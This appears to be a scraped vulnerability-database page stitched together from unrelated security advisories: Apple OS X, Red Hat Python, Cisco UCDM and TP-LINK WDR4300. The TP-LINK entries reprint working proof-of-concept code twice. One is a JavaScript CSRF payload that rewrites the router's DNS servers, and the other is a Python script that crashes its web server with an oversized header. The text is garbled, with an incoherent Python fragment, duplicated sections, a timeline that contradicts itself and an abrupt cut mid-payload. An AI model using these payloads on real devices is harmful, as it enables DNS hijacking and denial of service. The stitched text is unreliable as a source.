Description: A memory corruption issue existed in SceneKit. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3783 : Haris Andrianakis of Google Security Team
Security
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A standard user may be able to gain access to admin
privileges without proper authentication
Description: An issue existed in handling of user authentication.
This issue was addressed through improved authentication checks.
CVE-ID
CVE-2015-3775 : [Eldon Ahrold]
SMBClient
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in the SMB client.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3773 : Ilja van Sprundel
Speech UI
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted unicode string with speech
alerts enabled may lead to an unexpected application termination or
arbitrary code execution
Description: A memory corruption issue existed in handling of
Unicode strings. This issue was addressed by improved memory
handling.
CVE-ID
CVE-2015-3794 : Adam Greenbaum of Refinitive
sudo
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in sudo versions prior to
1.7.10p9, the most serious of which may allow an attacker access to
arbitrary files
Description: Multiple vulnerabilities existed in sudo versions prior
to 1.7.10p9. These were addressed by updating sudo to version
1.7.10p9.
CVE-ID
CVE-2013-1775
CVE-2013-1776
CVE-2013-2776
CVE-2013-2777
CVE-2014-0106
CVE-2014-9680
tcpdump
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in tcpdump versions
prior to 4.7.3. These were addressed by updating tcpdump to version
4.7.3.
CVE-ID
CVE-2014-8767
CVE-2014-8769
CVE-2014-9140
Text Formats
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted text file may lead to
disclosure of user information
Description: An XML external entity reference issue existed with
TextEdit parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team
udf
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3767 : beist of grayhash
OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:
https://support.apple.com/en-us/HT205033
OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCAAGBQJVzM3+AAoJEBcWfLTuOo7tx/YP/RTsUUx0UTk7rXj6AEcHmiR4
Y2xTUOXqRmxhieSbsGK9laKL5++lIzkGh5RC7oYag0+OgWtZz+EU/EtdoEJmGNJ6
+PgoEnizYdKhO1kos1KCHOwG6UFCqoeEm6Icm33nVUqWp7uAmhVRMRxtMJEScLSR
2LpsK0grIhFXtJGqu053TSKSCa1UTab8XWteZTT84uFGMSKbAFONj5CPIrR6+uev
QpVTwrnskPDBOXJwGhjypvIBTbt2aa1wjCukOAWFHwf7Pma/QUdhKRkUK4vAb9/k
fu2t2fBOvSMguJHRO+340NsQR9LvmdruBeAyNUH64srF1jtbAg0QnvZsPyO5aIyR
A8WrzHl3oIc0II0y7VpI+3o0J3Nn03EcBPtIKeoeyznnjNziDm72HPI2d2+5ZSRz
xjAd4Nmw+dgGq+UMkusIXgtRK4HcEpwzfImf3zqnKHakSncnFPhGKyNEgn8bK9a7
AeAvSqMXXsJg8weHUF2NLnAn/42k2wIE8d5BOLaIy13xz6MJn7VUI21pK0zCaGBF
sfkRFZP0eEVh8ZzU/nWp9E5KDpbsd72biJwvjWH4OrmkfzUWxStQiVwPTxtZD9LW
c5ZWe+vqZJV9eYRH2hAOMPaYkOQ5Z4DySNVVOFAG0eq9til8+V0k3L7ipIVd2XUB
msu6gVP8uZhFYNb8byVJ
=+0e/
-----END PGP SIGNATURE-----
. 6) - i386, x86_64
3. Space precludes documenting all of these changes in this
advisory. This could be used
to crash a Python application that uses the socket.recvfrom_info()
function or, possibly, execute arbitrary code with the permissions
of the user running vulnerable Python code (CVE-2014-1912).
This updates the python package to version 2.7.6, which fixes several
other bugs, including denial of service flaws due to unbound readline()
calls in the ftplib and nntplib modules (CVE-2013-1752).
Denial of service flaws due to unbound readline() calls in the imaplib,
poplib, and smtplib modules (CVE-2013-1752).
A gzip bomb and unbound read denial of service flaw in python XMLRPC
library (CVE-2013-1753).
Python are susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
negative value that is used an an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs.
Python before 2.7.8 is vulnerable to an integer overflow in the buffer
type (CVE-2014-7185). It was possible to configure a trust root to be checked against,
however there were no faculties for hostname checking (CVE-2014-9365).
The python-pip and tix packages was added due to missing build
dependencies. The verification
of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: python security, bug fix, and enhancement update
Advisory ID: RHSA-2015:2101-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2101.html
Issue date: 2015-11-19
CVE Names: CVE-2013-1752 CVE-2013-1753 CVE-2014-4616
CVE-2014-4650 CVE-2014-7185
=====================================================================
1. Summary:
Updated python packages that fix multiple security issues, several bugs,
and add various enhancements are now available for Red Hat Enterprise
Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
Python is an interpreted, interactive, object-oriented programming language
often compared to Tcl, Perl, Scheme, or Java. Python includes modules,
classes, exceptions, very high level dynamic data types and dynamic typing.
Python supports interfaces to many system calls and libraries, as well as
to various windowing systems (X11, Motif, Tk, Mac and MFC).
It was discovered that the Python xmlrpclib module did not restrict the
size of gzip-compressed HTTP responses. A malicious XMLRPC server could
cause an XMLRPC client using xmlrpclib to consume an excessive amount of
memory. (CVE-2013-1753)
It was discovered that multiple Python standard library modules
implementing network protocols (such as httplib or smtplib) failed to
restrict the sizes of server responses. A malicious server could cause a
client using one of the affected modules to consume an excessive amount of
memory. (CVE-2013-1752)
It was discovered that the CGIHTTPServer module incorrectly handled URL
encoded paths. A remote attacker could use this flaw to execute scripts
outside of the cgi-bin directory, or disclose the source code of the
scripts in the cgi-bin directory. An attacker able to control these arguments
could use this flaw to disclose portions of the application memory or cause
it to crash. (CVE-2014-7185)
A flaw was found in the way the json module handled negative index
arguments passed to certain functions (such as raw_decode()). An attacker
able to control the index value passed to one of the affected functions
could possibly use this flaw to disclose portions of the application
memory. (CVE-2014-4616)
The Python standard library HTTP client modules (such as httplib or urllib)
did not perform verification of TLS/SSL certificates when connecting to
HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack
connections and eavesdrop or modify transferred data. (CVE-2014-9365)
Note: The Python standard library was updated to make it possible to enable
certificate verification by default. However, for backwards compatibility,
verification remains disabled by default. Future updates may change this
default. Refer to the Knowledgebase article 2039753 linked to in the
References section for further details about this change. (BZ#1219108)
This update also fixes the following bugs:
* Subprocesses used with the Eventlet library or regular threads previously
tried to close epoll file descriptors twice, which led to an "Invalid
argument" error. Subprocesses have been fixed to close the file descriptors
only once. (BZ#1103452)
* When importing the readline module from a Python script, Python no longer
produces erroneous random characters on stdout. (BZ#1189301)
* The cProfile utility has been fixed to print all values that the "-s"
option supports when this option is used without a correct value.
(BZ#1237107)
* The load_cert_chain() function now accepts "None" as a keyfile argument.
(BZ#1250611)
In addition, this update adds the following enhancements:
* Security enhancements as described in PEP 466 have been backported to the
Python standard library, for example, new features of the ssl module:
Server Name Indication (SNI) support, support for new TLSv1.x protocols,
new hash algorithms in the hashlib module, and many more. (BZ#1111461)
* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl
library. (BZ#1192015)
* The ssl.SSLSocket.version() method is now available to access information
about the version of the SSL protocol used in a connection. (BZ#1259421)
All python users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues and add these
enhancements.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1046170 - CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip enconding
1046174 - CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
1058482 - tmpwatch removes python multiprocessing sockets
1112285 - CVE-2014-4616 python: missing boundary check in JSON module
1113527 - CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
1146026 - CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
1173041 - CVE-2014-9365 python: failure to validate certificates in the HTTP client with TLS (PEP 476)
1177613 - setup.py bdist_rpm NameError: global name 'get_python_version' is not defined
1181624 - multiprocessing BaseManager serve_client() does not check EINTR on recv
1237107 - cProfile main() traceback if options syntax is invalid
1250611 - SSLContext.load_cert_chain() keyfile argument can't be set to None
1259421 - Backport SSLSocket.version() to python 2.7.5
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
aarch64:
python-2.7.5-34.el7.aarch64.rpm
python-debuginfo-2.7.5-34.el7.aarch64.rpm
python-devel-2.7.5-34.el7.aarch64.rpm
python-libs-2.7.5-34.el7.aarch64.rpm
ppc64:
python-2.7.5-34.el7.ppc64.rpm
python-debuginfo-2.7.5-34.el7.ppc.rpm
python-debuginfo-2.7.5-34.el7.ppc64.rpm
python-devel-2.7.5-34.el7.ppc64.rpm
python-libs-2.7.5-34.el7.ppc.rpm
python-libs-2.7.5-34.el7.ppc64.rpm
ppc64le:
python-2.7.5-34.el7.ppc64le.rpm
python-debuginfo-2.7.5-34.el7.ppc64le.rpm
python-devel-2.7.5-34.el7.ppc64le.rpm
python-libs-2.7.5-34.el7.ppc64le.rpm
s390x:
python-2.7.5-34.el7.s390x.rpm
python-debuginfo-2.7.5-34.el7.s390.rpm
python-debuginfo-2.7.5-34.el7.s390x.rpm
python-devel-2.7.5-34.el7.s390x.rpm
python-libs-2.7.5-34.el7.s390.rpm
python-libs-2.7.5-34.el7.s390x.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64:
python-debug-2.7.5-34.el7.aarch64.rpm
python-debuginfo-2.7.5-34.el7.aarch64.rpm
python-test-2.7.5-34.el7.aarch64.rpm
python-tools-2.7.5-34.el7.aarch64.rpm
tkinter-2.7.5-34.el7.aarch64.rpm
ppc64:
python-debug-2.7.5-34.el7.ppc64.rpm
python-debuginfo-2.7.5-34.el7.ppc64.rpm
python-test-2.7.5-34.el7.ppc64.rpm
python-tools-2.7.5-34.el7.ppc64.rpm
tkinter-2.7.5-34.el7.ppc64.rpm
ppc64le:
python-debug-2.7.5-34.el7.ppc64le.rpm
python-debuginfo-2.7.5-34.el7.ppc64le.rpm
python-test-2.7.5-34.el7.ppc64le.rpm
python-tools-2.7.5-34.el7.ppc64le.rpm
tkinter-2.7.5-34.el7.ppc64le.rpm
s390x:
python-debug-2.7.5-34.el7.s390x.rpm
python-debuginfo-2.7.5-34.el7.s390x.rpm
python-test-2.7.5-34.el7.s390x.rpm
python-tools-2.7.5-34.el7.s390x.rpm
tkinter-2.7.5-34.el7.s390x.rpm
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-1752
https://access.redhat.com/security/cve/CVE-2013-1753
https://access.redhat.com/security/cve/CVE-2014-4616
https://access.redhat.com/security/cve/CVE-2014-4650
https://access.redhat.com/security/cve/CVE-2014-7185
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/articles/2039753
https://www.python.org/dev/peps/pep-0466/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFWTj/SXlSAg2UNWIIRAuXcAKCCJdw1P4H3y4fnhu6lXW2AcADYJgCfRO+v
qMX3qLAXBobeDiPX4eN9Pxc=
=JQMw
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201409-0403 | CVE-2014-3380 | Cisco Unified Communications Domain Manager Platform Software Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Domain Manager Platform Software 4.4(.3) and earlier allows remote attackers to cause a denial of service (CPU consumption) by sending crafted TCP packets quickly, aka Bug ID CSCuo42063.
A remote attacker may exploit this issue to trigger denial-of-service condition due to excessive CPU utilization.
This issue is being tracked by Cisco Bug ID CSCuo42063. This component features scalable, distributed, and highly available enterprise Voice over IP call processing
| VAR-201409-0078 | CVE-2014-4728 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware Web Service disruption at the server (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial of service vulnerability that allows an attacker to exploit a vulnerability to initiate a denial of service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company.
Versions Affected: 130617 , possibly earlier
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728
Vulnerabilities Description
===================
# Stored XSS -
It is possible inject javascript code via DHCP hostname field,
If the administrator will visit the dhcp clients page (web panel)
the script will execute.
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16:
Vendor released a fix.
Credits:
======
The Vulnerabilities was discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0077 | CVE-2014-4727 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware DHCP Cross-site scripting vulnerability in client page |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. Allows an attacker to exploit this vulnerability to execute arbitrary HTML or script code in the browser of an uninformed user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Advisory Information
===============
Vendors Contacted: TP-LINK
Vendor Patched: Yes, Firmware 140916
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.
# DoS (web server) -
Denial of service condition to the device web server, remotely or locally send the
device a "GET" request with an extra "Header" with a long value (A x 3000 times).
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA